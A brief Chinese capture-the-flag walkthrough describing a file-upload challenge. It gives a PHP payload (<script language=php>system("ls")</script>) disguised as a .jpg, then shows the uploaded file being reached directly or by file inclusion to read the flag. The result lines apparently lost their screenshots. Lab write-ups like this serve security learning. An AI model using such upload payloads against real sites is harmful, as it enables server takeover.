首先进去网站
发现是这么个东西 没有思路 只好右键查看源码 或 F12
发现注释文件upload.php,访问下来到文件上传页面
访问后发现 上传图片界面。。。
之后有两种方法!!!!!!!!!
1.
新建文档写入 <script language=php>system("ls")</script> 后另存为 jpg 格式
如作者新建了a文件并改为了jpg格式
之后选择并上传文件
访问 保存进去的文件 即 Save in 后面的 upload/201808080219242425.jpg
发现flag,文件包含,或 直接访问都可以
文件包含
得到
或者 直接访问
得到